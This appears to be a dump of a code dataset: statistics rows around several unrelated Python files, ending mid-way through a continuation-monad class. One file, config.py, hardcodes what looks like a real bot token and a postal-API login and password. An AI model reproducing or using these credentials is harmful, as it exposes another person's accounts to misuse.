| 20.75 | 56 | 0.771084 | 13 | 83 | 4.615385 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120482 | 83 | 3 | 57 | 27.666667 | 0.821918 | 0 | 0 | 0 | 0 | 0 | 0.325301 | 0.277108 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
50c7dd6eac01ba576abe09a2f9031f2911fde971 | 3,261 | py | Python | autodiff/decorators.py | gwtaylor/pyautodiff | 7973e26f1c233570ed4bb10d08634ec7378e2152 | [
"BSD-3-Clause"
] | 59 | 2015-02-03T20:50:59.000Z | 2020-05-26T05:38:54.000Z | autodiff/decorators.py | gwtaylor/pyautodiff | 7973e26f1c233570ed4bb10d08634ec7378e2152 | [
"BSD-3-Clause"
] | 3 | 2015-05-10T06:22:45.000Z | 2016-12-06T02:20:58.000Z | autodiff/decorators.py | gwtaylor/pyautodiff | 7973e26f1c233570ed4bb10d08634ec7378e2152 | [
"BSD-3-Clause"
] | 11 | 2015-04-15T16:52:09.000Z | 2017-06-28T12:10:39.000Z | from autodiff.symbolic import Symbolic, Function, Gradient, HessianVector
import collections
def function(fn=None, **kwargs):
    """
    Wraps a function with an AutoDiff Function instance, converting it to a
    symbolic representation. The function is compiled the first time it is
    called.

    Use bare::

        @function
        def python_function(...):
            return do_something()

    or pass keywords through to Function::

        @function(force_floatX=True)
        def python_function(x=1, y=2):
            return do_something()
    """
    # Fix: `collections.Callable` was removed in Python 3.10 (it lives in
    # collections.abc); the builtin callable() check is equivalent and portable.
    if callable(fn):
        return Function(fn, **kwargs)
    else:
        def function_wrapper(pyfn):
            return Function(pyfn, **kwargs)
        return function_wrapper
def gradient(fn=None, **kwargs):
    """
    Wraps a function with an AutoDiff Gradient instance, converting it to a
    symbolic representation that returns the derivative with respect to either
    all inputs or a subset (selected with the 'wrt' keyword). The function is
    compiled the first time it is called.

    Use bare::

        @gradient
        def python_function(...):
            return do_something()

    or pass keywords through to Gradient::

        @gradient(wrt=['x', 'y'])
        def python_function(x=1, y=2):
            return do_something()
    """
    # Fix: `collections.Callable` was removed in Python 3.10; use callable().
    if callable(fn):
        return Gradient(fn, **kwargs)
    else:
        def gradient_wrapper(pyfn):
            return Gradient(pyfn, **kwargs)
        return gradient_wrapper
def hessian_vector(fn=None, **kwargs):
    """
    Wraps a function with an AutoDiff HessianVector instance, converting it to
    a symbolic representation that returns the Hessian-vector product with
    respect to either all inputs or a subset (selected with the 'wrt'
    keyword). A tuple of the required vectors must be passed to the resulting
    function with the keyword '_vectors'. The function is compiled the first
    time it is called.

    Use bare::

        @hessian_vector
        def python_function(...):
            return do_something()

    or pass keywords through to HessianVector::

        @hessian_vector(wrt=['x', 'y'])
        def python_function(x=1, y=2):
            return do_something()
    """
    # Fix: `collections.Callable` was removed in Python 3.10; use callable().
    if callable(fn):
        return HessianVector(fn, **kwargs)
    else:
        def hv_wrapper(pyfn):
            return HessianVector(pyfn, **kwargs)
        return hv_wrapper
def as_symbolic(fn=None, **kwargs):
    """
    Wraps a function with an AutoDiff Symbolic instance, meaning it will act
    as a function expecting and operating on Theano objects. The function is
    not compiled.

    Use::

        @as_symbolic
        def python_function(...):
            return do_something()
    """
    # Fix: `collections.Callable` was removed in Python 3.10; use callable().
    if callable(fn):
        return Symbolic(fn, **kwargs)
    else:
        def function_wrapper(pyfn):
            return Symbolic(pyfn, **kwargs)
        return function_wrapper
theanify = as_symbolic | 27.871795 | 78 | 0.641214 | 391 | 3,261 | 5.26087 | 0.219949 | 0.088478 | 0.057851 | 0.033058 | 0.660671 | 0.63053 | 0.61157 | 0.589694 | 0.550802 | 0.421488 | 0 | 0.002537 | 0.274762 | 3,261 | 117 | 79 | 27.871795 | 0.86723 | 0.588163 | 0 | 0.387097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.258065 | false | 0 | 0.064516 | 0.129032 | 0.709677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
50cc80f625a434563d8bd32aa69e002c8f433cbc | 131 | py | Python | config.py | pythonjsgo/mail_tracking_bot | a541fed67b1b85f912088e0c4920ff9f6dabf5bb | [
"MIT"
] | null | null | null | config.py | pythonjsgo/mail_tracking_bot | a541fed67b1b85f912088e0c4920ff9f6dabf5bb | [
"MIT"
] | null | null | null | config.py | pythonjsgo/mail_tracking_bot | a541fed67b1b85f912088e0c4920ff9f6dabf5bb | [
"MIT"
] | null | null | null | TOKEN = "1807234388:AAHbvU9Crr6BURnLMwT8m4hrneGgxGvbm8A"
pochta_api_login = "YadBdduZvCLDvZ"
pochta_api_password = "oAD8k3MpRHq5" | 26.2 | 56 | 0.847328 | 11 | 131 | 9.727273 | 0.818182 | 0.168224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14876 | 0.076336 | 131 | 5 | 57 | 26.2 | 0.735537 | 0 | 0 | 0 | 0 | 0 | 0.545455 | 0.348485 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.333333 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
50cfd74d5dd92f459fa4e1ff1f665cd51c057e1f | 334 | py | Python | migrations/versions/0209_add_cancelled_status.py | tlwr/notifications-api | 88a6b7729edb9be41ce3e7c027f1452b7b6d00d2 | [
"MIT"
] | 51 | 2016-04-03T23:36:17.000Z | 2022-03-21T20:04:52.000Z | migrations/versions/0209_add_cancelled_status.py | tlwr/notifications-api | 88a6b7729edb9be41ce3e7c027f1452b7b6d00d2 | [
"MIT"
] | 1,335 | 2015-12-15T14:28:50.000Z | 2022-03-30T16:24:27.000Z | migrations/versions/0209_add_cancelled_status.py | tlwr/notifications-api | 88a6b7729edb9be41ce3e7c027f1452b7b6d00d2 | [
"MIT"
] | 30 | 2016-01-08T19:05:32.000Z | 2021-12-20T16:37:23.000Z | """
Revision ID: 0209_add_cancelled_status
Revises: 84c3b6eb16b3
Create Date: 2018-07-31 13:34:00.018447
"""
from alembic import op
revision = '0209_add_cancelled_status'
down_revision = '84c3b6eb16b3'
def upgrade():
    """Register the new 'cancelled' notification status."""
    op.execute("INSERT INTO notification_status_types (name) VALUES ('cancelled')")
def downgrade():
    """No-op: the 'cancelled' status row is deliberately left in place."""
    pass
| 16.7 | 83 | 0.748503 | 44 | 334 | 5.477273 | 0.75 | 0.058091 | 0.13278 | 0.182573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 0.140719 | 334 | 19 | 84 | 17.578947 | 0.69338 | 0.299401 | 0 | 0 | 0 | 0 | 0.455357 | 0.223214 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0.142857 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
50d3d8bef2a89f7fd1535b32b328c27fd6cea66d | 769 | py | Python | variation/translators/polypeptide_truncation.py | cancervariants/varlex | 3806317fa0125c3098e80124d5169fe6a13d50db | [
"MIT"
] | null | null | null | variation/translators/polypeptide_truncation.py | cancervariants/varlex | 3806317fa0125c3098e80124d5169fe6a13d50db | [
"MIT"
] | 15 | 2019-10-23T17:35:42.000Z | 2020-05-05T21:04:01.000Z | variation/translators/polypeptide_truncation.py | cancervariants/varlex | 3806317fa0125c3098e80124d5169fe6a13d50db | [
"MIT"
] | null | null | null | """Module for Polypeptide Truncation Translation."""
from variation.translators.translator import Translator
from variation.schemas.classification_response_schema import ClassificationType
from variation.schemas.token_response_schema import PolypeptideTruncationToken, Token
class PolypeptideTruncation(Translator):
    """Translator for Polypeptide Truncation classifications."""

    def can_translate(self, type: ClassificationType) -> bool:
        """Whether `type` is the Polypeptide Truncation classification."""
        is_truncation = type == ClassificationType.POLYPEPTIDE_TRUNCATION
        return is_truncation

    def is_token_instance(self, token: Token) -> bool:
        """Whether `token` is a PolypeptideTruncationToken."""
        return isinstance(token, PolypeptideTruncationToken)
| 45.235294 | 85 | 0.782835 | 77 | 769 | 7.714286 | 0.415584 | 0.176768 | 0.06734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141743 | 769 | 16 | 86 | 48.0625 | 0.9 | 0.276983 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.375 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
0fd606c0d74b41773b151cbc194b805f0ebef5a6 | 8,818 | py | Python | load_d2c_data/question_to_fields_final_perfect.py | 0bserver07/neural-engineers-first-attempt | 19760251b7080ffe2e7b15146af6844811da4141 | [
"MIT"
] | 10 | 2017-09-10T14:42:36.000Z | 2020-12-03T11:45:17.000Z | load_d2c_data/question_to_fields_final_perfect.py | 0bserver07/neural-engineers-first-attempt | 19760251b7080ffe2e7b15146af6844811da4141 | [
"MIT"
] | null | null | null | load_d2c_data/question_to_fields_final_perfect.py | 0bserver07/neural-engineers-first-attempt | 19760251b7080ffe2e7b15146af6844811da4141 | [
"MIT"
] | 7 | 2017-10-03T04:43:50.000Z | 2020-09-23T14:39:27.000Z | # -*- coding: utf-8 -*-
import string
import segtok.segmenter
import segtok.tokenizer
from segtok.tokenizer import symbol_tokenizer, word_tokenizer, web_tokenizer
from segtok.tokenizer import split_possessive_markers, split_contractions
'''ADD SECTION FOR CONVERTING EVERYTHING TO LOWER CASE'''
q = '''Description: ¶ Name string is a string consisting of letters "R","K" and "V". Today Oz wants to design a name string in a beautiful manner. Actually Oz's cannot insert these three letters arbitrary anywhere ,he has to follow some rules to make the name string look beautiful. First thing is that the name string should consist of at most two different letters. Secondly adjacent letters in name string must be different. ¶ ¶ After this procedure Oz wants name string to be as long as possible. Given the number of "R","K" and "V" letters that you have initially ,help Oz to find the maximum length of name string that Oz can make. ¶ ¶ Input : ¶ The first line contains the number of test cases T. Each test case consists of three space separated integers - A,B and C representing number of "R" letters, number of "K" letters and number of "V" letters respectively. ¶ ¶ Output : ¶ For each test case T, output maximum length of name string that Oz can make. ¶ ¶ Constraints : ¶ 1 ≤ T ≤100 ¶ 0 ≤ A,B,C ≤10^6 ¶ ¶ SAMPLE INPUT ¶ 2 ¶ 1 2 asfas 5 ¶ 0 0 2 ¶ ¶ SAMPLE OUTPUT ¶ 5 ¶ 1 ¶ ¶ Explanation ¶ ¶ For first sample : ¶ The longest name string possible is : VKVKV using 3 "V" letters and 2 "K" letters and its length is 5.'''
def char_split_if_io_example(sentence):
    '''ADD SECTION FOR CONVERTING EVERYTHING TO LOWER CASE'''
    """split text into characters"""
    """used for input/output examples for which char level info is relevant"""
    # Markers that identify an input/output example section.  The pilcrow
    # stands for a newline in the flattened problem statement (newlines are
    # replaced with ' ¶ ' before this function is called).
    i = 'Input ¶'
    o = 'Output ¶'
    '''
    i = 'Input \xb6'
    o = 'Output \xb6'
    '''
    # Python 2: keep the raw byte string for the marker search and work on
    # a unicode copy for tokenisation.
    sentence_encoded=sentence
    sentence=sentence.decode('utf-8')
    if i in sentence_encoded:
        # Everything after the "Input" marker is example data: tokenise the
        # marker itself, then split the remainder into single characters.
        sentence=sentence_encoded.split(i)
        sentence = word_tokenizer(i.decode('utf-8')) + list(sentence[1])
        s = sentence
        # Re-join the two UTF-8 bytes of the pilcrow (0xC2 0xB6) that the
        # character split tore apart, back into the single char u'\xb6'.
        for jdx, j in enumerate(sentence):
            if j == '\xc2':
                s[jdx:jdx+2]=[u'\xb6']
        sentence = s
    elif o in sentence_encoded:
        # Same treatment for an "Output" example section.
        sentence=sentence_encoded.split(o)
        sentence = word_tokenizer(o.decode('utf-8')) + list(sentence[1])
        s = sentence
        for jdx, j in enumerate(sentence):
            if j == '\xc2':
                s[jdx:jdx+2]=[u'\xb6']
        sentence = s
    else:
        # Not an example section: ordinary word-level tokenisation.
        sentence = word_tokenizer(sentence)
    return sentence
def split_nums(list_of_tokens):
    """Expand every token that contains a digit into its individual characters.

    Tokens without digits are kept whole; tokens with at least one digit are
    replaced by their characters, in order.
    """
    result = []
    for token in list_of_tokens:
        if any(ch in string.digits for ch in token):
            # Digit present: emit the token character by character.
            result.extend(token)
        else:
            result.append(token)
    return result
def question_to_tokenized_fields(question):
    """Split a flattened problem statement into a list of tokenised fields.

    The statement is expected to have newlines already replaced with ' ¶ '.
    Section headings (Description/Input/Output/Constraints/Examples/
    Explanation) are rewritten to '¡ <Name>' markers and the text is cut on
    the '¦' sentinel, then each piece is tokenised.
    """
    b = ['¡ Description']
    # Detach the examples section first; its presence distinguishes the
    # Codeforces layout (len(a) > 1) from the HackerEarth layout.
    a = question.replace('¶ ¶ Examples ¶ ', '¦¶ ¶ Examples ¶ ¶ ').replace('¶ Examples ¶ ', '¦¶ ¶ Examples ¶ ¶ ').split('¦')
    #You replace Note with Explanation in Codeforces
    #codeforces
    if len(a) > 1:
        for idx, i in enumerate(a):
            if idx == 0:
                # Text before the examples: split into sentences, then mark
                # the section headings and cut on '¦'.
                c=[]
                c+=[i.encode('utf-8') for i in segtok.segmenter.split_multi(a[idx].decode('utf-8'))]
                for i in c:
                    b+=i.replace('¶ ¶ Description ¶ ', '¡ Description¦').replace('¶ ¶ Input ¶ ', '¦¡ Input¦').replace('¶ ¶ Output ¶ ', '¦¡ Output¦').replace('¶ Input ¶ ', '¦¡ Input¦').replace('¶ Output ¶ ', '¦¡ Output¦').replace(' . ', ' .¦').replace('¶ ¶ ', '¦').split('¦')
            else:
                # Examples section and anything after it (notes etc.).
                c=[]
                c+=[i.encode('utf-8') for i in segtok.segmenter.split_multi(a[idx].decode('utf-8'))]
                for i in c:
                    b+=i.replace('¶ ¶ Input ¶ ', '¦¶ ¶ Input ¶ ').replace('¶ ¶ Examples ', '¡ Examples').replace('¶ Examples ', '¡ Examples').replace('¶ ¶ Output ¶ ', '¦¶ Output ¶ ').replace('¶ ¶ Note ¶ ', '¦¡ Explanation¦').replace('¶ ¶ Input : ¶', '¦¡ Input¦').replace('¶ ¶ Output : ¶', '¦¡ Output¦').replace(' . ', ' .¦').replace('¶ ¶ ', '¦').replace('¶ Output ¶', 'Output ¶').split('¦')
    #hackerearth
    else:
        # HackerEarth layout: many heading spellings ('Input :', 'Input:',
        # 'SAMPLE INPUT', 'Constraint(s)') are normalised to the same markers.
        c=[]
        c+=[i.encode('utf-8') for i in segtok.segmenter.split_multi(a[0].decode('utf-8'))]
        for i in c:
            b+=i.replace('Description: ¶ ', '').replace('¶ ¶ Output', '¶ Output').replace('¶ Output', '¶ ¶ Output').replace('¶ ¶ Input : ¶ ', '¦¡ Input¦').replace('¶ ¶ Output : ¶ ', '¦¡ Output¦').replace('¶ ¶ Input: ¶ ', '¦¡ Input¦').replace('¶ ¶ Output: ¶ ', '¦¡ Output¦').replace('¶ ¶ Input ¶ ', '¦¡ Input¦').replace('¶ ¶ Output ¶ ', '¦¡ Output¦').replace('¶ ¶ Input ', '¦¡ Input¦').replace('¶ ¶ Examples ', '¡ Examples').replace('¶ ¶ Output ', '¦¡ Output¦').replace('¶ ¶ Note ¶ ', '¦¡ Note¦') \
            .replace('¶ ¶ SAMPLE INPUT ¶', '¦¡ Examples¦¶ ¶ Input ¶').replace('¶ ¶ SAMPLE OUTPUT ¶', '¦¶ ¶ Output ¶').replace('¶ ¶ Constraints : ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraint : ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraints: ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraint: ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraints ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraint ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Explanation ¶ ', '¦¡ Explanation¦').replace('¶ ¶ ', '¦').split('¦')
    # Tokenise each non-empty field: char-split I/O examples, then split
    # contractions and digit-bearing tokens.
    b=[split_nums(split_contractions(char_split_if_io_example(x))) for x in b if x.strip()]
    return b
'''ADD SECTION FOR CONVERTING EVERYTHING TO LOWER CASE'''
if __name__ == '__main__':
    # Demo: run the tokeniser on a sample Codeforces problem statement.
    q = '''Overall there are m actors in Berland. Each actor has a personal identifier — an integer from 1 to m (distinct actors have distinct identifiers). Vasya likes to watch Berland movies with Berland actors, and he has k favorite actors. He watched the movie trailers for the next month and wrote the following information for every movie: the movie title, the number of actors who starred in it, and the identifiers of these actors. Besides, he managed to copy the movie titles and how many actors starred there, but he didn't manage to write down the identifiers of some actors. Vasya looks at his records and wonders which movies may be his favourite, and which ones may not be. Once Vasya learns the exact cast of all movies, his favorite movies will be determined as follows: a movie becomes favorite movie, if no other movie from Vasya's list has more favorite actors.
Help the boy to determine the following for each movie:
whether it surely will be his favourite movie; whether it surely won't be his favourite movie; can either be favourite or not.
Input
The first line of the input contains two integers m and k (1 ≤ m ≤ 100, 1 ≤ k ≤ m) — the number of actors in Berland and the number of Vasya's favourite actors.
The second line contains k distinct integers ai (1 ≤ ai ≤ m) — the identifiers of Vasya's favourite actors.
The third line contains a single integer n (1 ≤ n ≤ 100) — the number of movies in Vasya's list.
Then follow n blocks of lines, each block contains a movie's description. The i-th movie's description contains three lines:
the first line contains string si (si consists of lowercase English letters and can have the length of from 1 to 10 characters, inclusive) — the movie's title, the second line contains a non-negative integer di (1 ≤ di ≤ m) — the number of actors who starred in this movie, the third line has di integers bi, j (0 ≤ bi, j ≤ m) — the identifiers of the actors who star in this movie. If bi, j = 0, than Vasya doesn't remember the identifier of the j-th actor. It is guaranteed that the list of actors for a movie doesn't contain the same actors. All movies have distinct names. The numbers on the lines are separated by single spaces.
Output
Print n lines in the output. In the i-th line print:
0, if the i-th movie will surely be the favourite; 1, if the i-th movie won't surely be the favourite; 2, if the i-th movie can either be favourite, or not favourite.
Examples
Input
5 3
1 2 3
6
firstfilm
3
0 0 0
secondfilm
4
0 0 4 5
thirdfilm
1
2
fourthfilm
1
5
fifthfilm
1
4
sixthfilm
2
1 0
Output
2
2
1
1
1
2
Input
5 3
1 3 5
4
jumanji
3
0 0 0
theeagle
5
1 2 3 4 0
matrix
3
2 4 0
sourcecode
2
2 4
Output
2
0
1
1
Note
Note to the second sample:
Movie jumanji can theoretically have from 1 to 3 Vasya's favourite actors. Movie theeagle has all three favourite actors, as the actor Vasya failed to remember, can only have identifier 5. Movie matrix can have exactly one favourite actor. Movie sourcecode doesn't have any favourite actors. Thus, movie theeagle will surely be favourite, movies matrix and sourcecode won't surely be favourite, and movie jumanji can be either favourite (if it has all three favourite actors), or not favourite.
'''
    print(q)
    # Flatten the statement onto one line, replacing newlines with ' ¶ '
    # and trimming trailing pilcrows/spaces before tokenising.
    q = q.replace('\r\n', '\n').replace('\n', ' ¶ ').replace('¶ ¶', '¶ ¶').rstrip(' ¶').rstrip(' ').rstrip('¶').replace('† ', '† ').replace(' ‡', ' ‡')
    print(q)
    toked = question_to_tokenized_fields(q)
    print(toked)
    # Dump each field and each token within it (Python 2 print statement).
    for i in toked:
        print(i)
        for j in i:
            print j
| 47.408602 | 1,231 | 0.67487 | 1,597 | 8,818 | 3.863494 | 0.189731 | 0.015235 | 0.049595 | 0.035656 | 0.347326 | 0.285737 | 0.264019 | 0.213938 | 0.164344 | 0.164344 | 0 | 0.017184 | 0.188251 | 8,818 | 185 | 1,232 | 47.664865 | 0.805672 | 0.010093 | 0 | 0.244755 | 0 | 0.06993 | 0.666349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.034965 | null | null | 0.041958 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0fe0b94ebd4cf2a1e5c37a874ebee90f425e48c6 | 369 | py | Python | bc/documents/models.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-02-27T07:27:17.000Z | 2021-02-27T07:27:17.000Z | bc/documents/models.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | null | null | null | bc/documents/models.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-06-09T15:56:54.000Z | 2021-06-09T15:56:54.000Z | from django.db import models
from wagtail.documents.models import AbstractDocument
from wagtail.documents.models import Document as WagtailDocument
class CustomDocument(AbstractDocument):
    """Wagtail document model with an optional TalentLink attachment id."""

    # Id of the TalentLink attachment this document corresponds to
    # (NOTE(review): inferred from the field name — confirm against the
    # import code).  Nullable so manually uploaded documents need no value.
    talentlink_attachment_id = models.IntegerField(blank=True, null=True)

    # Expose the extra field on the Wagtail admin document form alongside
    # the default fields.
    admin_form_fields = WagtailDocument.admin_form_fields + (
        "talentlink_attachment_id",
    )
| 30.75 | 73 | 0.802168 | 41 | 369 | 7.02439 | 0.560976 | 0.076389 | 0.138889 | 0.180556 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135501 | 369 | 11 | 74 | 33.545455 | 0.902821 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 0.065041 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
0ff600b374b51c8ece3f7904f07c5e96da77511d | 237 | py | Python | tests/private_data.py | davidk/pytinysong | fa8e7bb02dee2a8979dbacec28e6df5f32d6c89d | [
"CC0-1.0"
] | null | null | null | tests/private_data.py | davidk/pytinysong | fa8e7bb02dee2a8979dbacec28e6df5f32d6c89d | [
"CC0-1.0"
] | null | null | null | tests/private_data.py | davidk/pytinysong | fa8e7bb02dee2a8979dbacec28e6df5f32d6c89d | [
"CC0-1.0"
] | null | null | null | import os
# Replace API_KEY with your personal API key from Tinysong if you want
# to run tests.
if 'TRAVIS_SECURE_ENV_VARS' in os.environ and os.environ['TRAVIS_SECURE_ENV_VARS'] == 'true':
KEY = os.environ['KEY']
else:
KEY=''
| 29.625 | 93 | 0.7173 | 40 | 237 | 4.075 | 0.625 | 0.165644 | 0.184049 | 0.233129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172996 | 237 | 7 | 94 | 33.857143 | 0.831633 | 0.350211 | 0 | 0 | 0 | 0 | 0.337748 | 0.291391 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e841fe2b78eb122d29ad90a9ec8c3ed750df4074 | 295 | py | Python | smolisa_py/asm/label.py | AsuMagic/smolisa-emu | 96fb84fbb783024618cb0cc2096fb24021cf3e5e | [
"MIT"
] | null | null | null | smolisa_py/asm/label.py | AsuMagic/smolisa-emu | 96fb84fbb783024618cb0cc2096fb24021cf3e5e | [
"MIT"
] | null | null | null | smolisa_py/asm/label.py | AsuMagic/smolisa-emu | 96fb84fbb783024618cb0cc2096fb24021cf3e5e | [
"MIT"
] | null | null | null | class Label:
def __init__(self, name):
self.name = name
class LabelAccess:
    """A reference to a label that selects one byte of its value."""

    def __init__(self, name, lower_byte):
        # Name of the referenced label.
        self.name = name
        # True selects the lower byte, False the upper byte (see the
        # `high`/`low` helper functions in this module).
        self.lower_byte = lower_byte
def high(name):
    """Return a LabelAccess selecting the high byte of label ``name``."""
    return LabelAccess(name, lower_byte=False)
def low(name):
    """Return a LabelAccess selecting the low byte of label ``name``."""
    return LabelAccess(name, lower_byte=True)
e84b37db84fb224f136e811ebfe2d8fd1580231a | 159 | py | Python | src/liquidhandling/hudson/__init__.py | AD-SDL/hudson-liquidhandling | a9d7ba9c85062e821ba8e650f4e4ee011c80be4e | [
"MIT"
] | 1 | 2021-06-29T20:24:38.000Z | 2021-06-29T20:24:38.000Z | src/liquidhandling/hudson/__init__.py | AD-SDL/hudson-liquidhandling | a9d7ba9c85062e821ba8e650f4e4ee011c80be4e | [
"MIT"
] | null | null | null | src/liquidhandling/hudson/__init__.py | AD-SDL/hudson-liquidhandling | a9d7ba9c85062e821ba8e650f4e4ee011c80be4e | [
"MIT"
] | null | null | null | from .SoloSoft import SoloSoft
from .RapidPick import RapidPick
from .SoftLinx import SoftLinx
__all__ = [
"SoloSoft",
"RapidPick",
"SoftLinx",
]
| 15.9 | 32 | 0.704403 | 16 | 159 | 6.75 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201258 | 159 | 9 | 33 | 17.666667 | 0.850394 | 0 | 0 | 0 | 0 | 0 | 0.157233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e8549f7d6bf867a5a531818be0f0f8e6fcc92ffb | 1,899 | py | Python | oslash/cont.py | sobolevn/OSlash | ffdc714c5d454f7519f740254de89f70850929eb | [
"Apache-2.0"
] | null | null | null | oslash/cont.py | sobolevn/OSlash | ffdc714c5d454f7519f740254de89f70850929eb | [
"Apache-2.0"
] | null | null | null | oslash/cont.py | sobolevn/OSlash | ffdc714c5d454f7519f740254de89f70850929eb | [
"Apache-2.0"
] | null | null | null | """ The Continuation Monad
* https://wiki.haskell.org/MonadCont_under_the_hood
* http://blog.sigfpe.com/2008/12/mother-of-all-monads.html
* http://www.haskellforall.com/2012/12/the-continuation-monad.html
"""
from typing import Any, Callable
from .util import identity, compose
from .abc import Monad, Functor
class Cont(Monad, Functor):
    """The Continuation Monad.

    Represents a suspended computation in continuation-passing style
    (CPS): a function that, given "the rest of the program" as a
    callback, produces the final result.
    """

    def __init__(self, cont: Callable[[Callable], Any]) -> None:
        """Wrap the CPS function ``cont``."""
        self._value = cont

    @classmethod
    def unit(cls, a: Any) -> 'Cont':
        """Lift a plain value into the monad.

        Haskell: a -> Cont a
        """
        def feed(continuation):
            return continuation(a)
        return cls(feed)

    def map(self, fn: Callable[[Any], Any]) -> 'Cont':
        r"""Apply ``fn`` to the eventual result of this computation.

        Haskell: fmap f m = Cont $ \c -> runCont m (c . f)
        """
        def mapped(continuation):
            return self.run(compose(continuation, fn))
        return Cont(mapped)

    def bind(self, fn: Callable[[Any], 'Cont']) -> 'Cont':
        r"""Sequence this computation with the CPS-producing function ``fn``.

        Haskell: m >>= k = Cont $ \c -> runCont m $ \a -> runCont (k a) c
        """
        def bound(continuation):
            return self.run(lambda a: fn(a).run(continuation))
        return Cont(bound)

    @staticmethod
    def call_cc(fn: Callable) -> 'Cont':
        r"""call-with-current-continuation.

        Haskell: callCC f = Cont $ \c -> runCont (f (\a -> Cont $ \_ -> c a )) c
        """
        def with_cc(continuation):
            # ``escape`` packages the current continuation so that invoking
            # it aborts the rest of ``fn`` and jumps straight out.
            def escape(a):
                return Cont(lambda _ignored: continuation(a))
            return fn(escape).run(continuation)
        return Cont(with_cc)

    def run(self, *args: Any) -> Any:
        """Run the suspended computation; with no args, return the raw CPS function."""
        return self._value(*args) if args else self._value

    def __call__(self, *args: Any, **kwargs: Any) -> Any:
        return self.run(*args, **kwargs)

    def __eq__(self, other) -> bool:
        # Two continuations are equal when running both with the identity
